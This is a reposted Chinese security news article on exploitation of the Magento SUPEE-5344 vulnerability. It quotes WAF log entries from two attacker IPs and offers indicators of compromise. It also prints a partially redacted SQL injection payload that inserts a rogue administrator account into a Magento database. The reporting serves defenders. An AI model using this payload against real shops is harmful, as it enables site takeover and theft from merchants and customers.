转载

电子商务系统Magento远程代码漏洞EXP流出，黑客已开始大规模扫描

上周FreeBuf报道了电子商务系统Magento远程代码执行漏洞（SUPEE-5344）的消息，现在CheckPoint安全团队放出了漏洞利用（EXP）的部分细节。

漏洞利用视频

这个视频可以证明漏洞的有效性，视频里面安全研究者利用一个Magento网站越权给自己加了一张优惠券：

当然，这是一个简单的例子，该漏洞可以有更多的玩法。

日志中发现大量攻击请求

如大家所预料的是，国外黑客已经利用这个漏洞EXP在遍地撒网了。在漏洞披露后，我们通过WAF日志看到了不少对这个漏洞进行扫描的日志：

62.76.177.179 – – [23/Apr/2015:00:45:44 -0400] “POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1″ 403 1880 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36″ 185.22.232.218 – – [22/Apr/2015:00:42:38 -0400] “POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1″ 200 2211 “-” “Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0″

日志里所有的攻击来自两个IP：62.76.177.179和185.22.232.218，如果你在日志里发现这两个IP的话，估计你不幸地遭受过这个犯罪组织的扫描攻击。

攻击分析

我们的研究小组捕获并分析了他们EXP，从现有的信息来看，他们只是试图在Magento数据库里创建一个admin用户，很明显他们还会进行后续工作来接管被黑的网站，被解密的exp部分信息如下：

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0); SET @SALT = “rp”; SET @PASS = CONCAT(MD5(CONCAT( @SALT , ‘123’) ), CONCAT(‘:’, @SALT )); SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL; INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (‘Firstname’,’Lastname’,”email@example.com”,’ypwq‘,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW()); INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,’U’,(SELECT user_id FROM admin_user WHERE username = ‘ypwq’),’Firstname’); –

以上代码利用的是SQL注入，往网站数据库里插入了新的admin_user。如果你怀疑自己被黑了，你可以查查你的数据库里有没有多出defaultmanager或者vpwq两个用户名，这两个用户名是该犯罪团伙所具备的攻击特征之一。

在这里给大家说声抱歉，我们隐藏了部分细节和完整的攻击负载（Payload），因为这样能避免部分小白黑客直接复制代码，轻易地拿去批量黑站。但是高水平的黑客组织应该已经开发出漏洞利用程序，而且已经开始没日没夜地扫描和入侵。

*参考来源 sucuri ，由FreeBuf小编dawner翻译整理，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM）

正文到此结束